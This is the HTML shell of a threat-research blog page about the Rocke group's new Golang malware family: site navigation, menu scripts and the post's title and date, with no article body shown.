viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-are-stix-taxii" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What Are STIX/TAXII?</div></div></a></div><a href="/resources/what-is-mitre-attack-and-how-is-it-useful" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is MITRE ATTACK?</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Free Tools</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/staxx" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">STAXX<br/></div><p class="text-size-small text-weight-normal">STAXX gives you an easy way to access any STIX/TAXII feed.</p></div></a></div></div></div></div></nav></div></div></div></div></div><div class="navbar_link-partners is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c9aa" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">PARTNERS</div></div></div><a href="/partners" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Partners Overview</div><p class="text-size-small text-weight-normal">Anomali is dedicated to fostering strong partnerships, ensuring shared success and growth through collaborative innovation and mutual support.</p></div></a><a href="/partners/directory" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Browse our Partner Directory</div></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Channel Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We help MSSPs, resellers, system integrators, and distributors enable their customers with accelerated investigation and response, improved visibility, and automated SOC operations.<br/></p></div><div class="margin-bottom margin-small"><a href="/partners/channel" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More</div></div></a></div><div class="margin-bottom margin-small"><a href="/partners/channel/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Channel Partner<br/></div></div></a></div><a href="https://anomali.channeltivity.com/Login" target="_blank" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Visit the Partner Portal<br/></div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Technology Alliance Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We offer a robust set of APIs and Sales Development Kits (SDKs) to seamlessly integrate with other technologies and help deliver better business outcomes for customers.<br/></p></div><div class="margin-bottom margin-small"><a href="/partners/technology" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More</div></div></a></div><a href="/partners/technology/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Technology Alliance Partner</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intel Sharing</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We offer the leading global threat sharing platform for ISACs, ISAOs, industry groups, holding companies, and other threat intel sharing communities seeking to power secure collaboration.</p></div><div class="margin-bottom margin-small"><a href="/partners/threat-intel-sharing" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More<br/></div></div></a></div><a href="/partners/threat-intel-sharing/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Threat Intelligence Sharing Partner<br/></div></div></a></div></div></div></nav></div></div></div></div></div><div class="navbar_link-company is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2ca07" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">COMPANY</div></div></div><a href="/company" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">About Us</div><p class="text-size-small text-weight-normal">Anomali is the leader in modernizing security operations with the power of analytics, intelligence, automation, and AI to deliver breakthrough levels of visibility, threat detection and response, and cyber exposure management.</p></div></a><a href="/company/leadership" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Leadership</div></div></a><a href="/company/careers" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Careers</div></div></a><a href="/press-room" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Press Room</div></div></a><a href="/company/awards" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Awards</div></div></a><a href="/company/reviews" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Reviews</div></div></a><a href="/contact" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Contact Us</div></div></a><a href="/request-a-demo" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Schedule a Demo</div></div></a></div></div></div></div></nav></div></div></div></div></div><div class="navbar-sticky navbar3"><div class="padding-global"><div class="container-large"><div data-animation="default" class="navbar padding-bottom-0 tablet-version w-nav" data-easing2="ease" fs-scrolldisable-element="smart-nav" data-easing="ease" data-collapse="medium" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2ca30" role="banner" data-duration="400"><div class="navbar_wrapper"><div class="navbar_inside-wrapper"><div class="navbar_sticky-wrapper navbar3"><div class="navbar3_logo-wrapper"><a href="/" class="w-nav-brand"><img width="200" height="Auto" alt="" src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6615615b4e92d82289e9b0be_anomali%20logo%20white.svg" loading="lazy" class="navbar3_logo is-new"/></a></div><div class="navbar3_menu"><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div fs-selectcustom-element="label" class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Products</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list"><a href="/platform" class="new_nav_dropdown-links-item full-link w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Platform</div><p class="text-size-small text-weight-normal">The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. Simply different.</p></div></a><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Automation</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/copilot" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Copilot</div><p class="text-size-small text-weight-normal">Immediate, correlated insight: Search petabytes of data in seconds.</p></a><a href="#" class="new_nav_dropdown-link hide w-inline-block"><div class="text-size-small text-weight-semibold">Integrator</div><p class="text-size-small text-weight-normal">Automate response: Transform risk insights into real-time protections.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Detection and Response</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/security-analytics" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Security Analytics</div><p class="text-size-small text-weight-normal">Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Threat Intelligence</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/threatstream" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali ThreatStream</div><p class="text-size-small text-weight-normal">The external landscape: From data to insights in minutes.</p></a><a href="#" class="new_nav_dropdown-link hide w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Intelligence Channels</div><p class="text-size-small text-weight-normal">Your curated intelligence: Accelerate your time to protection.</p></a></div></div><a id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2ca6c-07e133ca" href="/siem-consolidation" class="button-v2 is-secondary is-navbar w-button">Navigating the siem storm?</a></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Marketplace</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout is-75"><div class="new_nav_dropdown-links-list _3-col"><a href="/marketplace" class="new_nav_dropdown-links-item full-link w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Marketplace</div><p class="text-size-small text-weight-normal">A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools.</p></div></a><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Marketplace Offerings</div><div class="new_nav_dropdown-link-wrapoper"><a href="/marketplace/threat-intelligence-feeds" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Intelligence Feeds</div><p class="text-size-small text-weight-normal">Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more.</p></a><a href="/marketplace/threat-analysis-tools" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Analysis Tools and Enrichments</div><p class="text-size-small text-weight-normal">Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">For Partners</div><div class="new_nav_dropdown-link-wrapoper"><a href="/marketplace/security-system-partners" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Security System Partners</div><p class="text-size-small text-weight-normal">Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence cost.</p></a><a href="/marketplace" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Marketplace for Partners</div><p class="text-size-small text-weight-normal">The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers.</p></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Resources</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list _5-col"><div class="new_nav_dropdown-links-item full-link"><div class="text-size-regular text-weight-semibold">Libraries</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Resources</div><p class="text-size-small text-weight-normal">Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more.</p></a><a href="/company/events" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Events</div><p class="text-size-small text-weight-normal">Join Anomali for any of our online or in-person events throughout the year to learn how we can help you achieve your cyber security goals. We'd love to see you online or  in-person!</p></a></div></div><div class="new_nav_dropdown-links-item hide"><div class="text-size-regular text-weight-semibold">AI Automation</div><div class="new_nav_dropdown-link-wrapoper"><a href="#" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Copilot?</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Threat Intelligence</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-is-threat-intelligence" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Intelligence?</div></a><a href="/resources/sharing-threat-intelligence" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Intelligence Sharing</div></a><a href="/resources/what-is-a-tip" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is a Threat Intelligence Platform?</div></a><a href="/resources/what-is-a-cyber-fusion-center" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is a Cyber Fusion Center?</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Analytics</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-is-security-analytics" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Security Analytics?</div></a><a href="/resources/what-is-soar" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is SOAR?</div></a><a href="/resources/understanding-threat-exposure-management" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Exposure Management?</div></a><a href="/resources/what-is-threat-detection-investigation-and-response" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Detection, Investigation, and Response?</div></a><a href="/resources/evolution-future-of-siem" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">The Evolution and Future of SIEM</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Frameworks</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-are-stix-taxii" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What Are STIX/TAXII?</div></a><a href="/resources/what-is-mitre-attack-and-how-is-it-useful" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is MITRE ATTACK?</div></a></div></div><div id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2cae4-07e133ca" class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Free Tools</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/staxx" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">STAXX</div><p class="text-size-small text-weight-normal">STAXX gives you an easy way to access any STIX/TAXII feed.</p></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Partners</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list _4-col"><div class="new_nav_dropdown-links-item full-link"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Partners Overview</div><p class="text-size-small text-weight-normal">Anomali is dedicated to fostering strong partnerships, ensuring shared success and growth through collaborative innovation and mutual support.</p></a><a href="/partners/directory" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Browse our Partner Directory</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/channel" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Channel Partners</div><p class="text-size-small text-weight-normal">We help MSSPs, resellers, system integrators, and distributors enable their customers with accelerated investigation and response, improved visibility, and automated SOC operations.</p></a><a href="/partners/channel/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Channel Partner</div></a><a href="https://anomali.channeltivity.com/Login" target="_blank" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Visit the Partner Portal</div></a></div></div><div id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2cb0d-07e133ca" class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/technology" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Technology Alliance Partners</div><p class="text-size-small text-weight-normal">We offer a robust set of APIs and Sales Development Kits (SDKs) to seamlessly integrate with other technologies and help deliver better business outcomes for customers.</p></a><a href="/partners/technology/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Technology Alliance Partner</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/threat-intel-sharing" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Threat Intel Sharing</div><p class="text-size-small text-weight-normal">We offer the leading global threat sharing platform for ISACs, ISAOs, industry groups, holding companies, and other threat intel sharing communities seeking to power secure collaboration.</p></a><a href="/partners/threat-intel-sharing/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Threat Intelligence Sharing Partner</div></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Company</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout is-75"><div class="new_nav_dropdown-links-list _3-col"><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/company" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">About Us</div><p class="text-size-small text-weight-normal">Anomali is a revolutionary AI-Powered Security Operations Platform that is the first and only solution to bring together security operations and defense capabilities into one proprietary cloud-native big data solution.</p></a><a href="/company/leadership" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Leadership</div></a><a href="/company/careers" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Careers</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/press-room" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Press Room</div></a><a href="/company/reviews" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Reviews</div></a><a href="/company/awards" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Awards</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/contact" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Contact Us</div></a><a href="/request-a-demo" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Schedule a Demo</div></a></div></div></div></div></nav></div><div class="button-group"><a href="/request-a-demo" class="button-v2 w-button">Schedule A Demo</a></div><div class="wg-element-wrapper sw5 w-locales-list"><div data-delay="300" data-hover="false" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2cb4e" class="wg-dropdown-1 w-dropdown"><div class="wg-dd-1-togle w-dropdown-toggle"><div class="navbar2_link-text hide">en</div><div class="lang_icon-wrapper"><div class="icon-1x1-regular is-new w-embed"><svg width="100%" height="100%" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg"> <g clip-path="url(#clip0_458_3116)"> <path d="M7.96667 15.9668C12.0904 15.9668 15.4333 12.6238 15.4333 8.50011C15.4333 4.37639 12.0904 1.03345 7.96667 1.03345C3.84294 1.03345 0.5 4.37639 0.5 8.50011C0.5 12.6238 3.84294 15.9668 7.96667 15.9668Z" stroke="black" stroke-miterlimit="10"/> <path d="M2.5 13.5133C3.84933 12.164 5.716 11.3267 7.78 11.3267C9.844 11.3267 11.7107 12.164 13.06 13.5133" stroke="black" stroke-miterlimit="10"/> <path d="M13.06 3.48657C11.7107 4.83591 9.844 5.67324 7.78 5.67324C5.716 5.67324 3.84933 4.83591 2.5 3.48657" stroke="black" stroke-miterlimit="10"/> <path d="M7.98833 15.9668C9.3626 15.9668 10.4767 12.6238 10.4767 8.50011C10.4767 4.37639 9.3626 1.03345 7.98833 1.03345C6.61406 1.03345 5.5 4.37639 5.5 8.50011C5.5 12.6238 6.61406 15.9668 7.98833 15.9668Z" stroke="black" stroke-miterlimit="10"/> <path d="M0.5 8.5H15.4333" stroke="black" stroke-miterlimit="10"/> </g> <defs> <clipPath id="clip0_458_3116"> <rect width="16" height="16" fill="white" transform="translate(0 0.5)"/> </clipPath> </defs> </svg></div></div></div><nav data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2cb54" class="wg-dd-1-list w-dropdown-list"><div role="list" class="w-locales-items"><div role="listitem" class="locale w-locales-item"><a hreflang="en" href="/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" aria-current="page" class="wg-dropdown-1-link w--current">English</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="es" href="/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Español</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="fr-FR" href="/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Français</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="it" href="/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Italiano</a></div></div></nav></div></div></div></div></div></div></div></div></div></div><div class="navbar_script hide w-embed w-script"><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  <style> .navbar2_menu-arrow { transform: rotate(0deg); } body { margin: 0; padding: 0; } .content { height: 2000px; /* Replace with the actual height of your content */ padding: 20px; /* Adjust padding to your design */ } .navbar-sticky { position: sticky; top: 0; z-index: 100; background-color: white; } </style>  <script> $(document).ready(function() { $('.navbar2_dropdown-link').hover( function() { $(this).click(); } ); }); /*Navbar Sticky Start*/ /*var navbar = document.querySelector(".navbar-sticky"); var navbarOffsetTop = navbar.offsetTop; var heightBox = document.querySelector(".height-box"); // Add this line to select the .height-box element window.addEventListener("scroll", function () { if (window.scrollY >= navbarOffsetTop) { navbar.style.position = "fixed"; navbar.style.top = "0"; heightBox.style.display = "block"; // Show the .height-box element } else { navbar.style.position = "relative"; heightBox.style.display = "none"; // Hide the .height-box element } });*/ /*Navbar Sticky End*/ var navbar = document.querySelector('.navbar-sticky'); var navbarOffsetTop = navbar.offsetTop; var heightBox = document.querySelector('.height-box'); window.addEventListener('scroll', function() { if (window.innerWidth >= 992) { if (window.scrollY >= navbarOffsetTop) { navbar.style.position = 'fixed'; navbar.style.top = '0'; heightBox.style.display = 'block'; } else { navbar.style.position = 'relative'; heightBox.style.display = 'none'; } } }); </script> <script> document.addEventListener('DOMContentLoaded', function() { var currentlyOpenDropdown = null; var dropdowns = document.querySelectorAll('.navbar2_menu-item'); dropdowns.forEach(function(dropdown) { var arrow = dropdown.querySelector('.navbar2_menu-arrow'); var navbar3Links = dropdown.querySelectorAll('.navbar3_link'); dropdown.addEventListener('click', function(event) { event.stopPropagation(); // Stop event propagation to prevent document click from immediately closing the dropdown if (currentlyOpenDropdown && currentlyOpenDropdown !== dropdown) { var previousArrow = currentlyOpenDropdown.querySelector('.navbar2_menu-arrow'); previousArrow.style.transition = 'transform 0.2s ease'; previousArrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown.classList.remove('w--open'); toggleFontStyle(currentlyOpenDropdown, false); } dropdown.classList.toggle('w--open'); currentlyOpenDropdown = dropdown; if (dropdown.classList.contains('w--open')) { arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(180deg)'; toggleFontStyle(dropdown, true); } else { arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown = null; toggleFontStyle(dropdown, false); } }); }); // Event listener to close the dropdown when clicking outside of it document.body.addEventListener('click', function() { if (currentlyOpenDropdown) { var arrow = currentlyOpenDropdown.querySelector('.navbar2_menu-arrow'); arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown.classList.remove('w--open'); toggleFontStyle(currentlyOpenDropdown, false); currentlyOpenDropdown = null; } }); function toggleFontStyle(dropdown, isOpen) { var navbar3Links = dropdown.querySelectorAll('.navbar3_link'); navbar3Links.forEach(function(link) { link.style.transition = 'color 0.2s ease, font-weight 0.2s ease'; // Add transition for color and font weight change link.style.color = isOpen ? '#002B71' : '#000000'; link.style.fontWeight = isOpen ? '600' : 'normal'; // Change font weight to 600 when dropdown is open, otherwise, reset to normal }); } }); </script></div></header></header><main class="main-wrapper"><div class="section_header"><header class="header_sub-section background-color-darkblue"><div class="padding-global"><div class="container-large"><div class="padding-section-large padding-bottom-xxlarge tablet-version blog"><div class="header_text-center"><div class="max-width-xlarge"><div class="margin-bottom margin-medium"><div class="content-center blog"><div class="blog_header_text">March 15, 2019</div><div class="blog_header_text">-</div><div class="blog_header_text no-space">Anomali Threat Research</div><div class="w-condition-invisible">,</div><div class="blog_header_text w-dyn-bind-empty"></div></div></div><h1 class="blog-h1 text-align-center">Rocke Evolves Its Arsenal With a New Malware Family Written in Golang</h1></div></div></div></div></div></header><header class="header_sub-section overlap-header"><div class="padding-global"><div class="container-large"><div class="header_text-center"><div class="max-width-xlarge"><img src="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" loading="lazy" alt="" class="blog_cover-image"/></div></div></div></div></header><section class="section_resource_cta_final"><div class="padding-global"><div class="container-large"><div class="padding-section-medium"><div class="nested-collection-don-t-delete hide"><div class="w-dyn-list"><div fs-cmsnest-collection="category" 